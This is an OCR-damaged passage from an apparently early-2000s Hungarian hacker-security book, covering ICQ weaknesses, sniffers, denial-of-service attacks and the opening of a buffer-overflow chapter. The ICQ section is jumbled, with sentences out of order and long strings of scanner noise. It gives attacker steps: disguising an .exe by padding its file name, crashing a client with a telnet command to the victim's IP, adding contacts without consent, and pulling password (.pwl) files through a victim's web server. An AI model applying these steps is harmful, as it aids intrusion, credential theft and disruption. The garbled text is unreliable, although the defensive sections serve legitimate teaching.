(lásd ebben a fejezetben. Ez a szám a Universal Identifier Number. és a támadóknak szállítják a megfelelő információkat. vagy egyszerűen a UIN. Az ICQ minden felhasználója egy saját számot kap. az Away és az Invisible. Az ICQ legnagyobb veszélye tulajdonképpen abban rejlik. Ezért ez sem jelent biztos védelmet. Ha egy másik felhasználót keresünk. Az IP kiadása ugyan különböző beállításokkal megakadályozható (a 99b verziótól egy másikat is lehet megtévesztésként mutatni). 2000b ICQ-pager-értesítés egy Sub7 szerveren ICQ message-window 8. 2. amelyek kikerülik ezeket a beállításokat. mert túl veszélyes". Így a rendszer nem tud elindulni. hogy „Van-e ICQ-d?" egyre gyakrabban kapjuk azt a választ.asp?ReleaseID=193 89 címen a Microsofttól letölthető egy patch a bug kijavításához. A leggyakrabban használt Windows-kliens mellett Linux alatt is több kliens létezik. és újra kelljen indítani. Azok a támadások is kedveltek. hogy a támadónak információkat szolgáltat az áldozatról. 1. a Mailbombák alatt.praktikus és veszélyes Az „I seek you" egy kommunikációs eszköz. Ezek közül is egyértelműen az IP a legfontosabb.microsoft. mint magán az ICQnetworkön. ofíline-ban. vagy ki akarja. amely.com/downloads/release. Az ICQ-kliensen egy session közben megváltoztathatjuk a saját státuszunkat. hogy pillanatnyilag békén hagyják. és a gép lefagy.

itt nem lényeges információkkal. def.jpg.8. Bizonyos parancsokkal összefüggésben azonban az egész merevlemezt is formattálhatják.com/link. hogy a támadó küld a usernek egy fájlt. például egy trójait vagy egy vírust. hogy az ICQ-kliensünket úgy állítjuk be. A trükk a következő: a támadó kitömi a def. pl.exe Az exe fájlból semmit sem látni *-ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD h»ADADADADADADvADADADADADADADADADADADvADADADADA |*>DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D i*-ADADADADADADADAD *»D D D D D A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD ^A£)A£)A£)A£>A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A A A A A . Egy ilyen támadást hajtottak végre például tesztcélokból egy Windows 98 és egy 2000 platform „ellen". hogy azonnal eldobja az ismeretlen linkeket.asp? A DADADADADADADADADADADADADADADADADADADADADADAD *-ADADADADADADADAD ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A *-DADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *»ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA *-DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *-ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADAD!Ü! pl A£)A£)A£)A£)A£)VA£)A£)A£)» *DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ^•ADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA *»DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ta»A£)A£)A£)A£)A£)A£)A£)A£) Védelem Ez ellen úgy lehet védekezni. Ha elküldi ezt a fájlt.exe fájl nevét egy sor üres karakterrel. a fogadónál megjelenik egy popup ablak a fájl megnevezésével és más. Fájlnevek kitömése az ICQ 99 alatt Ahogy mailben.4.yahoo. egy trójait vagy egy vírust stb.2 Milyen biztonsági rések vannak? Korrupt linkek A különböző linkek megnyitása az ICQ-felhasználónál aktiválhat egy fájlt. A link így nézhet ki: http://www. És itt is működik az ott már leírt trükk: tegyük fel.jpg . úgy ICQ-val is lehet fájlokat küldeni és fogadni. amelyeket nekünk küldenek.

Ha a támadó például egy trójait vagy egy vírust használt. anélkül. ahol a 217. Megnézni egy felhasználó fájljait Itt megintcsak előfeltétel.exe végződés helyett csak a -jpg-et látjuk. hogy felkerült egy listára. ráadásul anélkül. Ezáltal az áldozat ICQ-ja bezáródik. hogy az erről bármit is tudna. User hozzáfűzése engedély nélkül Az ICQ jóváhagyása időnként elég terhes a támadóknak. Mire minden hibaüzenetet tudomásul vettek. a Next-re kattint. a parancssorba a következőt írja: Telnet 217. akár meg is támadhatja. hogy az áldozat ezt észrevenné. és a hacker ismerje az IP-jét. Az . Az ICQ hibajelzéseket ad. Ezt a problémát elkerülendő. Ezért a legjobb védekezés az aktuális verzióra történő frissítés. a támadónak a következő lehetőségei vannak. hogy a rendszeres frissítés legalább rövid távon védelmet kínál. A felhasználó azt gondolja. Itt az IP! Az ICQ lefagyasztása ICQ alatt megmutathatjuk más felhasználóknak. linkkel lehet elérni. Ha ezt elintézte. Ez az ICQ-path megadása után a kontaktlistára bejegyzett userek minden IP-jét visszaadja. a Find User-rel megkeresi azt az UIN-t.. .exe már nem látható. amely közli. ha elfogadja és végrehajtja a fájlt. Ha ez sikerült. amit gyakran ki is használ. hogy az ICQ nem tud üzeneteket küldeni. amelyek lehetővé teszik a felhasználó felvételét a kapcsolati listára anélkül. hogy a felhasználó egy webszervert telepített.172.82. vagy ha akarja. hogy működtetünk-e webszervert a rendszerünkön. ha egy áldozatot akarnak felvenni a kontaktlistájukra. és egy idő múlva nem jelenik meg online-ként. Egy ilyen jel a hackernek égből pottyant ajándék.40-et a megtalált IP-re cseréli. és megpróbál hozzáfűzni egy felhasználót. hogy megtámadja ezeket a rendszereket. a támadó már ott van a kívánt személy kapcsolati listáján. hogy ő bármit is észrevenne ebből. Rendesen ugyanis kap egy értesítést. inaktiválja az ICQ-t. és a tulajdonképpeni végződés. egyetlen kattintással kijelöli a személy nevét. Az így jelzett webszerver ugyanis behatolási pontot nyújthat a támadónak. hogy tényleg csak egy képet akarnak küldeni neki. és most is megjegyzendő. Védekezés Az ICQ rendszeresen dolgozik chat-rendszere biztonságán. Védelem Ez a bug az ICQ 2000-ben már nincs benne. amelyet hozzá akar fűzni. Most teljes nyugalomban megfigyelheti az áldozatát.172.40:80. az . Amint az ICQ a kérdésre pozitív választ ad. akkor a felhasználóból. hogy többet megtudjon a chat-partneréről. Az interneten ehhez egész sor tool és crack van. Ha a hackernek csak az áldozat IP-je van meg. megpatcheli a crackkel. Vagy a támadó a partnerrel való beszélgetés közben egyszerűen beírja a parancssorba: netstat -n. amelyek azt mondják. Letölt magának egy ICQ-cracket az internetről.Így a popup ablakban már nincs elég hely. Ezután egyszerűen Quit-et ír a Telnet kliensbe. Ezután meg kell szakítani a kapcsolatot a hálóval. Egy erre a célra szívesen használt eszköz a UIN-IP.82. Ez egy jó példa volt az ICQ kliens még fennálló bizonytalanságaira. könnyen áldozat lesz. Ezt többnyire a fenti ikonra történő kattintással vagy a http://ipdesusers.

A pontok a könyvtárakat jelölik.Most például beírhatná a böngészőjébe: http:// 217. Természetesen ez csak egy példa.82. így a jelszavak elérésére is van lehetőség.40 /.html/.40 az áldozat IP címe.172.82.172.pwl. Most a támadó a számítógépére tudja menteni a kiválasztott fájlokat. hogy a C:\-hez jusson. amelyekre váltani kell. Védekezés Ha webszervert kell futtatnunk. A legtöbb esetben azonban a Windows szabvány könyvtárstruktúrája fordul elő. . mert a támadó nem fogja ismerni a pontos könyvtárstruktúrát. ahol a 217. ne használjuk ezen a gépen az ICQ-t. user.

fejezet .2 9.3 9.Tartalom 9.9.4 Mi az a sniffer? Hogyan működik egy sniffer? A sniffer veszélyei Mit lehet tenni a snifferek ellen? .1 9.

és milyen gondokat okozhatnak. Az elfogott információkat a sniffer az output (kimeneti) fájlokba menü. amely a hálózati interfészt úgynevezett promiscuous módra állítja át. Ha elküldünk egy üzenetet. az Az Analyzer az egyik legismertebb sniffer . A snifferek a WWW/LAN/WAN egyes gépeire telepíthetők. aki installálta a sniffert. hogy mit is rejt ez a fogalom. A hálózatban gyakran használnak hub-ot az adatok szétosztására. ethernet frame-nek is nevezett csomagokban kerül a hub-ra. Ez különbözteti meg a komputert a hálózat többi tagjától. Ha például gondok támadnak a hálózat egy részében a hiányos konfiguráció miatt. Ezek közé tartoznak többek között: a TCP/IP (Ethernet/WWW). az IPX.2 Hogyan működik egy sniffer? Egy számítógép valamennyi hálózati interfészének saját címe van a LAN-on. ha azok nem az illető gépnek vannak címezve. Másrészt a snifferek lehetőséget nyújtanak a támadóknak. akkor a rendszergazda bevethet egy sniffert. hogy csak a valóban releváns adatokkal foglalkozzon. Így a sniffer hozzákezdhet a tulajdonképpeni munkájához. lehetnek például jelszavak vagy felhasználói nevek. betekintést kínálva annak. Hasonló rendszert találunk az internet-címzésnél is. és onnan továbbítódik minden csatlakoztatott számítógépre. Ebből a fejezetből kiderül. A többi hálózati interfész ugyan fogadja az adatokat. amelyiknek címezve vannak. hogy magállapítsa.9 Sniffer A snifferek jelentik az egyik legnagyobb veszélyt a hálózatokra. Ezért a legtöbb sniffert úgy tervezték. Annak persze nem lenne értelme. hogy a hálózat teljes adatforgalmát kiértékelje. Ezen a ponton avatkozik be a sniffer. és rendszerint egy fájlba írják az analizált adatokat. az Apple Talk. 9.1 Mi az a sniffer? A sniffereknek különböző felhasználási területeik vannak. A felhasznált sniffertől függően különböző protokollokat lehet lehallgatni. külön kis. Ez a mód bizonyos alkalmazásokon keresztül akkor is megengedi a csomagok felvételét és feldolgozását. naplózzák az adatfolyamot. a sniffer tulajdonságaitól függően. de a nem neki szóló címzés miatt nem dolgozza fel azokat. hol van a probléma a hálózaton belül. hogy egész hálózati csomagokat „hallgassanak le". Az adatokat csak az a számítógép veszi fel. melyek a snifferek felhasználási területei. mert a legtöbb információ egyáltalán nem érdekes. Egyrészt a rendszergazdák pótolhatatlan segítőtársai a hálózati problémák vagy a potenciálisan veszélyeztetett területek felderítésében. Ezek. 9. a Banyán VINES és az LCC.

A snifferek a normál felhasználó szempontjából semmilyen nyomot nem hagynak maguk után. A döntően hálózati felhasználás azonban alapvetően nagyobb ráfordítást igénylő intézkedéseket tesz szükségessé. Mivel egy sniffer csak úgy tud működni. tulajdonképpen semmit sem érnek. Ezeket használják akkor is. hogy a fogadott adatokat minden vele kapcsolatban álló számítógépnek elküldi. és a felhasználók sem veszik szívesen. Ha azonban a támadó egy.4 Mit lehet tenni a snifferek ellen? A snifferek felfedezéséhez és eltávolításához jól kell ismerni a hálózati topológiát. Ez a protokoll Ipsec-et is tartalmaz. ha van egy saját. a reakcióideje hosszabb lesz az általában szokásosnál. a Hewlett-Packard és az Intel. az IBM. ha a hálózati kártya promiscuous módban van. Az olyan biztonsági intézkedések. amit a sniffelés után magával visz. Így azután nem is szükséges közvetlenül beavatkozni egy meghatározott felhasználó rendszerébe ahhoz. amelyek. adatokat küldenek. Ha biztosra akarunk menni. amelyek csak egyszer érvényesek. a 3Com. kevéssé hatékony. amikor egy hálózat teljesítményének a gyenge pontjait keresik.3 A sniffer veszélyei A snifferek nagy veszélyt jelentenek a hálózati struktúrára. Ezeknél jelszavak kiosztásáról van szó. amely Ipv6 vagy IPng néven ismert. Részletesen most nem foglalkozunk az Ipv6-tal. állandó jelszavuk. mint az S/Key vagy a SecurelD-Token. A csatlakozások ellenőrzése A rendszergazda is ellenőrizheti a LAN-ban található számítógépek hálózati kártyáit promiscuous módra vagy egyéb gyanús alkalmazásokra. mégpedig úgy. mint hogy nem tároljuk a jelszavakat a merevlemezen. mert jobban szeretik.9. amelyek tesztelni tudják a hálózati reakcióidőket. A reakcióidő ellenőrzése Ha egy számítógépre. vagyis passzívan működnek. Vannak programok. mint a fentiek. Felhasználói oldalról titkosító protokollokkal. valóban csak a célgépre továbbítják az adatokat. Ezek az eszközök azonban drágábbak az egyszerű hub-oknál. Intézkedés Hálózati kártya Leírás Egyszerűbb és olcsóbb megoldás megfelelő hálózati kártyával felszerelni a LAN-ra csatlakoztatott számítógépeket. azonban ahogy ez a protokoll majd szabvánnyá válik a hálón. amely szintén kódolva továbbítja az adatokat. A mail-postafiókok elleni támadásoknak is van egy biztos ellenszere. ez a variáció. Ipv6 Hamarosan megjelenik a TCP/IP új verziója. A leleplezéshez csak a rendszergazdáknak vannak különböző programjaik. az S/POP nevű eljárás. Ha egy hálózatban rendszeresen tesztelik az egyes csatlakoztatott számítógépek reakcióidejét. a hálózatba integrált notebookot használ. amelyik potenciális sniffer lehet. amelynek a hálózati interfésze promiscuous módban van. mint amilyen az SSH vagy az SSL. . Ilyen kártyákat (is) kínai pl. ráadásul csak a támadó gépén futnak. védhetjük az adatainkat a siffherek ellen. amely nem engedélyezi ezt a módot. Nagyobb hálózatoknál megfontolandók az olyan biztonsági mechanizmusok. a megoldás kézenfekvőnek tűnik: csak olyan hálózati kártyát szabad használni. Intézkedés Adatelosztás Leírás Egy sniffer támadási pontját tulajdonképpen a hubnak az a tulajdonsága nyitja meg. Titkosítás Az alkalmazásokban használt kódolás minden bizonnyal a legfontosabb védelem a sniffer-támadások ellen. éppúgy. amelynél az adatok hálózati szinten lesznek kódolva. amelyekről a továbbiakban még írni fogunk. akkor jól be lehet határolni azt a számítógépet. Titkosítással biztonságossá lehet tenni az adatátvitelt. mert a teljes hálózati adatforgalmat felügyelhetik. Az alábbi táblázatból részletesen megismerhetők a védelmi mechanizmusok. hogy kikémleljék mail-postafiókja vagy online banki jelszavát. a hub-ok helyett switcheket vagy auto-switching hub-okat is használhatunk. Sajnos ez az eljárás elég költséges. hogy csak a címzett gép tudja dekódolni. a normál hubokkal ellentétben. Ezért a normál hálózati felhasználó aligha tudja felfedezni a sniffert a LAN-on. 9. mert ezeket bármikor megtudhatja a sniffer. a snifferek problémája is meg fog szűnni (egy időre).

Védelmi Intézkedések a snifferek ellen Végeredményben azonban mindig lesznek programok. mert többnyire csak bizonyos hálózati kártyák búgjait ellenőrzik. hogy milyen szolgáltatásokat veszünk igénybe a kevéssé biztonságos hálózatokon keresztül. akkor a megnyitáshoz szükséges jelszó megint csak a hálózaton megy keresztül.c is ismert. Az ilyen programokkal szemben azonban mindig egy kicsit szkeptikusnak kell maradni. ha a fájlok megnyitása a saját gépen történik. amelyek felhívják a figyelmet az ilyen támadásokra. mégsem kínálnak lehetőséget az adatok kódolására. hogy védetten lehessen bejelentkezni a Telnetről. Már böngészőket is lehet kapni megfelelő erős kódolással. amelyek ugyan hálózatról működnek. csupán mail-szolgáltatást kínáló szolgáltató csak üzletileg kínálja az SSL használatát. hogy sok. Tehát figyelni kell arra. amely mint snifftest. amelyek azt a számítógépet ellenőrzik. de nincs nagy hasznuk. a kódolási folyamatnak automatikusnak is kellene lennie. A szokásos Telnet-kliensek helyett SSH-klienset (Secured Shell) is lehet használni. vagy olyan programokat használnak. például a jelszavakat és a parancsokat is. Vannak azonban olyan programok is. Anti-sniffer' A hálón a legkülönbözőbb programokat kínálják a snifferek felkutatásához. mivel ott az adatok eleve kódolva továbbítódnak. új lehetőséget kellett fejleszteni. amely csak biztonságosan kódolva továbbítja az adatokat. Az e-mail-küldésnél mindenesetre problematikus. ha egy másik számítógép éppen sniffel. A PGP-vel vagy hasonló programokkal kódolt fájlok/mailek biztonságában is csak akkor lehet bízni. SSL SSH Mivel a Telnet kódolatlanul továbbítja az adatokat. Igazán csak az IPv6 használatával lehet majd biztonságos adatátvitellel számolni. így ezt is minden sniffer foghatja. Az olyan programok. Ha azonban a PGP-vel kódolt maileket a mail-szerveren nyitják meg (ami biztosan gyakran megtörténik). így a sniffer nem tud mit kezdeni velük. Mivel a legtöbb felhasználó nem szívesen használ manuális kódolást. Unixhoz/Linuxhoz a Beavis and Butthead. .Intézkedés Leírás A HTTP-átvitelek titkosítására szolgál az interneten az SSL (Secure Socket Layer). Ilyen program pl. amelyek leleplezik. elérhetik ugyan a céljukat. amelyen éppen lokálisan rajta vagyunk.

8 10.7 10.3 10.1 10. fejezet.9 Ping-Flodding Smurf DDoS .Tartalom 10.a „nuken" Large Packet-támadások avagy a Ping of Death Land támadások 10.6 10.5 TCP-Syn-Flooding 10.Distributed Denial of Service támadások Védelem a DoS-támadások ellen .2 10.10.4 Az IP-spoofing mint előfeltétel Out-of-Band csomagok .

például a webszervereket. mind a 2000-t ellenállóvá tette e támadások ellen.Telnet session-ökhöz használják. és ezzel a protokollal továbbítódik. az eBay. és úgy lefagyasztják. A Microsoft felismerte ezt a hibát. sok DoS-támadás alapját képzi. . A különböző támadásokhoz egész sor eszköz áll a támadók rendelkezésére. hogy a támadó nyomait eltüntessék. hogy ezeknek a támadásoknak különböző fajtái vannak.10 A Denial of Service támadás A DoS. hogy a rendszert egy időre lebénítsa. és a 139. 1998-ban létrejött egy védelmi szervezet.2 Out-of-Band csomagok . Ezért az Out of Band csomagokat az olyan rendszerek megtámadásához használják.többek között . Ha a 135. és megakadályozzák az azonosítását. a rendszer összeomlik.a „nuken'' A legismertebb DoS-támadások közé tartozik a miken vagy az Out-ofBand (OOB) csomagok küldése. akik game-szervereken vagy IRC-szervereken találhatók. aki két napig bombázta a Yahoo-t és társait. amelynél a csomag feladójának a címét megváltoztatják. és . ha a támadó nem talál más utat. Az Out of Band csomagok felhasználását a DoS-támadásokhoz a Microsoft egy hibás NetBEUI implementációja tette lehetővé. Az eredmény azonban mindig ugyanaz: a megtámadott számítógép felmondja a szolgálatot.01-t például így lehetne megtámadni: 100 kapcsolatot állítanak elő a WinGates-hez. hogy a rendszert lerohanja. Egy ilyen támadásnál számítógépeket rohannak le az interneten. és mind a Windows 98/98SE/ME-t. Az OOB a TCP/IP egyik tulajdonsága. mert csak a szervezethez kapcsolódó rendszerekből érkező támadásokat akadályozza meg. ez csak egy behatárolt megoldás.szolgáltatás megtagadó) támadások az internet egyik legnagyobb veszélyforrásává váltak az idők során. a CNN és néhány más nagyobb portál ellen a hálón. Megengedi az adatok átvitelét a normál sorrenden kívül. két napon belül indították a Yahoo. hogy az egy ideig nem is tudja újrakezdeni a működését. programok és protokollok hibáit használják ki. A WinGatesszerver feltételezi. Sajnos. hogy hamis identitást színleljenek a megtámadott IT-rendszer felé.(Denial of Service -. A DoS-támadások az operációs rendszerek. Így a támadót. A WinGates 4. mint a szervereket. hogy minden Kettő a legismertebb nukerek közül 10. amelyeknek többnyire jól kezelhető. vagy arra szolgál. amelynél hamis IP-számot használnak. ami azt jelenti. mint például a WinGates. A DoS-támadások célzott végrehajtásának másik oka lehet például. és ezeken egyenként körülbelül 40000 karaktert küldenek. A rendszerek kiesése következtében fellépő kár mintegy 100 millió dollárra rúgott. portok egy számukra nem értelmezhető karaktersort kapnak. Az IP-spoofing. így a támadónak még alaposabb technikai ismeretekkel sem kell rendelkeznie a használatukhoz. Vagy már a támadást is ez teszi lehetővé. Az egyik legismertebb támadást 2000 februárjában. 10. vagy ha éppen az a célja. amely lehetetlenné teszi hamisított IP-csomagok internetre küldését a csatlakoztatott hálózatüzemeltetőknél.1 Az IP-spoofing mint előfeltétel Az IP-spoofing egy támadási eljárás. grafikus felületük van. Kedvelt célok azok a felhasználók is. csak a hencegése alapján kapták el egy idevágó chatszobában. DoS-támadásokat többnyire akkor hajtanak végre. hogy egy rendszert újraindításra kényszerítsenek valamilyen változtatás érvénybe léptetése érdekében (jelszó: trójai). A DoS-támadások ugyanúgy érintik az internet-felhasználókat.

és várja a választ az ACK l-re és 2-re. majd összeomlást idézzenek elő. Ha ezt a várakozási időt a támadó arra használja. • A host válaszol a SYN l-re. • A támadó elküldi a SYN l-et. Ezeket SYNcsomagoknak is nevezik. amelyről ebben a fejezetben még szó lesz. Aki viszont Land támadást hajt végre. A host ezt megpróbálja egy „OK. egy ilyen támadás lefolyásának a sémája.a feladó címe megegyezik a címzettel. és várja a választ. és előállítani a kapcsolatot. Ez utóbbinak semmi köze a tulajdonképpeni ping-parancshoz. elküldi az ACK 2-ét. 10. de ezt a csomagot most egy saját nyitott portjára fogja küldeni. Minden csomagtöredék tartalmaz egy offset értéket és egy azonosítási számot. és válaszul ACK-csomagot (ACK = Acknowledgement = a fogadás nyugtázása) küld. vagyis feldarabolja. hamisított feladóval küldi a SYN-csomagokat egy szerverre . valamint a portszám. Az első csomagban még egy TCP-header is található. Röviddel a halálos lökés előtt Mikor egy számítógép kapcsolatot próbál felépíteni egy másikkal. hogy egy rendszert hatalmas adatfolyammal terheljenek. a nemlétező feladó miatt. A TCP-Syn-Flodding támadásnál a támadó először hamis feladóval nagy számú SYN-csomagot. Ha most a rendszergazda megpróbál belépni. hogy a hostot rettenetes mennyiségű további SYNcsomaggal bombázza. a protokoll-implementáció említett hibáját kihasználva. az rövid időn belül felmondja a szolgálatot. Az ennél nagyobb csomagokat fragmentálja. elküldi az ACK l-et. hogy egyszerűbb legyen az átvitelük. . 10. A címzett reagál erre. sikertelen lesz. amely a teljes csomagot nagyobbnak mutatja 65535 bájtnál. A szerver minden SYN-csomagra ACK-csomaggal válaszol. • A támadó elküldi a SYN 2-t. íme. hogy milyen csomagról van szó. Ez a következőképpen történik. amely meghatározza. A támadásnak ezt a fajtáját az elkészült bugfixekkel ma már a legtöbb operációs rendszer visszaveri.kapcsolat fennmarad.4 Land támadások A Land támadások a TCP-implementáció egy hibáját használják ki ahhoz. Ezek ellen a támadások ellen is régóta létezik már bugfix. és a számítógép bizonyos várakozási idő után eredménytelennek nyilvánítja a kísérletet. • A host válaszol a SYN 2-re. hogy az adatok át tudjanak futni a különböző hálózati rétegeken. • A támadó elküldi a SYN 3-at. Ez a túlméretezett csomag túlcsordulást (Buffer Overflow-t) okoz a rendszerben. és az adattömeg addig halmozódik. Ezt a folyamatot Three Way Handshake-nek is nevezik.3 Large Packet-támadások avagy a Ping of Death A Denial of Service támadások különösen végzetes fajtája a Ping of Death. Ezek a tények teszik lehetővé. UDP és TCP. a résztvevők először egy Three Way Handshake-et váltanak. Az Internet Protokoll headerrel (fejléccel) együtt pontosan 65535 bájtot csomagol egyetlen csomagba. Ez a kísérlet azonban. ahol a sok IP-stack egyfajta túlcsordulást idéz elő. és a gép összeomlik. amelyekkel bejelenti a kapcsolatot. kész vagyok" ACKválaszcsomaggal nyugtázni. • És így tovább. ha két számítógép között TCP/IP-n keresztül jön létre kapcsolat. Mindez azért történik. amíg el nem használja a szerver pufferét. akkor speciális IP-csomagokat küld. 10. az Ethernet-csomagok pedig csak 1500 bájtosak. és megbénítja az áldozat rendszerét. vagyis „Beszélni akarok veled" üzenetet küld a hostra. hogy az utolsó töredéknek olyan offset értéket lehet adni. out of buffer hibaüzenetet kap. és aztán újra reassemblálja (összerakja) őket.5 TCP-Syn-Flooding Mint ahogy a Land támadásoknál már leírtuk. A Ping of Death támadások a következő protokolloknál lehetségesek: ICMP.

amelyre minden. Pingekkel bombázzák a célt. az áldozatéi. s az áldozatot csomagok áradatával önti el. hogy távirányítani tudja a szá- . Az előkészítés abból áll. Ráadásul a ping-flodding támadásokat az áldozat csak akkor fogja észrevenni. Az ilyen támadások után többnyire teljesen le kell venni a szervert a hálózatról. Ezt használják ki a támadók a Ping-Floddingnál. azt eredményezik.cert. hanem arra is használhatják a támadók. Előkészület egy DDoS támadásra 10. A gyártók előbb vagy utóbb felfedezik az operációs rendszerekben és a szerverszoftverekben a biztonsági szempontból gyenge pontokat. 10. ha a szolgáltatója a forgalom szerint számol el. a host pedig valamennyire megpróbál válaszolni. Legyen az szerver vagy normál felhasználó . Megpingelünk egy hostot. A DoS-támadások ellen a jól konfigurált tűzfalak is védelmet kínálnak. mítógépeket.7 Smurf A Smurf-nél a támadó egy hálózat broadcast címére küld egy pinget manipulált feladócímmel. Ezeken a rendszereken trójaiakat helyez el. illetve a programokat többnyire trójaiak segítségével telepítik a rendszerekre.6 Ping-Flodding A pingeket az interneten és a hálózatokban használják. ezért is elengedhetetlen. Ez bizony rengeteg választ jelent. hogy sor kerüljön a további feldolgozásukra. és rövid idő múlva frissítést kínálnak hozzájuk. 10. Ehhez a támadó hibás rendszereket keres szkenneléssel (közelebbit lásd a szkennelésről szóló fejezetben). A segítségükkel el lehet kapni a módosított csomagokat. (A trójaikról a 4.minden esetben érvényes.) Ha elegendő kiszolgálót talált. A megváltoztatott feladócímek. amelyeken biztosítani tudja magának a rendszergazdai jogokat. hogy rajta keresztül hajtsák végre más rendszerek ellen a támadásokat. az eBay és társai ellen. A scripteket. és beszerzési forrást kínálnak a megfelelő frissítésekhez. érdemes előfizetni a Computer Emergency Response Teams (CERT) levelezőlistájára http://www. visszhangszerű választ ad. az áldozat több mint egymillió választ kap. fejezetben írtunk. hogy a támadó a lehető legtöbb olyan rendszert megtalálja.8 DDoSDistributed Denial of Service támadások A DDoS-nál (DDoS-támadás = elosztott szolgáltatás megtagadó támadás) még a tulajdonképpeni roham előtt szerez a támadó elérést néhány másik rendszerre.9 Védelem a DoS-támadások ellen A normál felhasználó számítógépe nemcsak áldozata lehet a DoStámadásoknak. a broadcast cím mögötti számítógép válaszol. hogy mindig legyen aktuális vírusvizsgáló a gépünkön. hogy megállapítsák egy host elérhetőségét. Ha ilyen módon másodpercenként 1000 pinget küldenek 1000 különböző számítógépre. és meg lehet akadályozni. hogy fel tudja tölteni a scripteket a támadáshoz. hogy minden választ az áldozat kap meg. Ezek azonnal tájékoztatnak az újabb gyenge pontok felfedezéséről. ezeket feltölti scriptekkel vagy programokkal.10. hogy mindig tájékozódni kell a mindenkori operációs rendszer biztonságot érintő frissítéseiről.vagy ISDN-csatlakozás) is térdre tudnak kényszeríteni nagy átviteli sávszélességgel rendelkező áldozatokat. amitől az összeomlik. februári híres DDoS támadások óta állandóan növekszik az ilyen jellegű támadásokra alkalmas programok száma a Yahoo. és ha elérhető. Smurffel akár nagyon kis átviteli kapacitással rendelkező támadók (modem. Hogy a gyenge pontok dolgában mindig képben legyünk.org és a gyártóéra. Ha az ismétlés elég gyakori. a host nem tud több kérdésre válaszolni. és ezeket arra használja. hogy az áldozatát nagy mennyiségű adatcsomaggal szembesítse. Az érintett rendszer a bemenő adatok terhe alatt szó szerint összeomlik. A 2000.

5.2 Adatok 11.2.2.1 Az operációs rendszer memóriakezelése 11.1.Tartalom 11.2.2 A Buffer-Overflow-k és a tűzfalak . 11.1 Hogyan lehet ezt kihasználni? 11.3 Minek kell a Shellcode változónál állnia? 11.1.11.2 A Buffer-Overflow-támadások 11.3 11.4 11.1 Összefüggés a CPU és a Buffer-Overflow között.5 Áldozat a Buffer-Overflow-kért Honnan lehet felismerni a Buffer-Overflow-t? Milyen védelmi mechanizmusok vannak? 11.2 Hogyan működik? 11. fejezet .3 A stack (magyarul: halom/rakás) 11.1 Szöveg 11.1.5.

Alsó memória SZÖVEG inicializált adatok inicializálatlan adatok Felső memória STACK Memóriafelépítés 11. számú és legalul az 1. elsőként kerülnek ki. first out) működik. mint amilyennel például a pipe-nál találkozhatunk.1 Szöveg Egy adott programhoz rendelt memóriatartomány több részre oszlik. hogy később speciális jogokat szerezzenek a szerverhez. amelyekre egy program futása ugrik. A legérdekesebb ezekben a támadásokban a Buffer-Overflow-rohamok függetlensége a támadó székhelyétől. 11. Ezt úgy csinálják. A Buffer-Overflow-rohamokat arra használják. Így végre lehet hajtani fizikai hozzáféréssel a szerverhez. amelyekkel az egész számítógép felett ellenőrzést szereznek. például a Súgó szövege. amelyek . hogyan vezethet a rossz programozás biztonsági résekhez. 11.1. ha egy eljárás vagy függvény lefutott.3 A stack (magyarul: halom/rakás) A stacket elképzelhetjük úgy. amelyben a normál változók adatai találhatók.2 Adatok Az adatrész inicializált és inicializálatlan adatokra osztható. Ezeket a karakterláncokat az operációs rendszer „readonly"-ként kezeli. hogy megöröklik a megszakított szolgáltatás jogait. mint amennyit az fel tud dolgozni. ellentétben a FIFO-elvvel (first in. A stack az a memóriaterület. Ennek a hozzárendelt területnek a méretét a „brk" paranccsal lehet megkapni. A címek. Egyes esetekben ez akár a boot-jogokig terjedhet.. amelyek már nem férnek be a pufferba. Azokat az adatokat. egy bizonyos szolgáltatást összeomlásra kényszeríteni.1 Az operációs rendszer memóriakezelése Az alábbi vázlat egy operációs rendszer memóriafelépítését szemlélteti. Más elérések „segmentation fault" hibával végződnek. amelyet egy program kiad. vagyis Buffer-Overflow támadásokhoz lehet felhasználni. Az alsó memóriában illetve a szövegrészben csak karakterláncok vannak tárolva. mint egymásra halmozott lapokat. szintén a stackben tárolódnak (például a szegmensek kezdő címei. De arra is lehet használni ezeket a támadásokat. hogy többet írnak a pufferbe. ahol legfelül van a 10. Ennek következtében az . amelyek legfelül helyezkednek el (tehát utoljára kerültek oda). hogy támadásokat hajtsanak végre szerverek ellen.1. Ebben leírta.) Erről azonban később. amelyeket aztán puffer-túlcsordulásos. számú lap. ahelyett. A stack LIFO-elven (last in. Ezzel egymásra épülő célokat lehet elérni: pl.1.static"-ként deklarálódnak. first out). hogy eldobná a program. Ez azt jelenti. megpróbálja beleírni. vagyis ezeken nem lehet változtatni. 11.11 Buffer-Overflow 11.2 A Buffer-Overflow-támadások A Buffer-Owerflow tulajdonképpen annyit jelent. hogy kidöntsenek egy weboldalt. de távoli eléréssel is. hogy az elemek. A stack szerkesztésének legfontosabb assembler parancsai a PUSH (adatokat tesz a stackhez) és a POP (olvassa a stack legfelső elemét). 1996-ban az AlephOne Bugtraq levelezőkör moderátora cikket közölt Smashing the Stack for Fun and Profit címen.

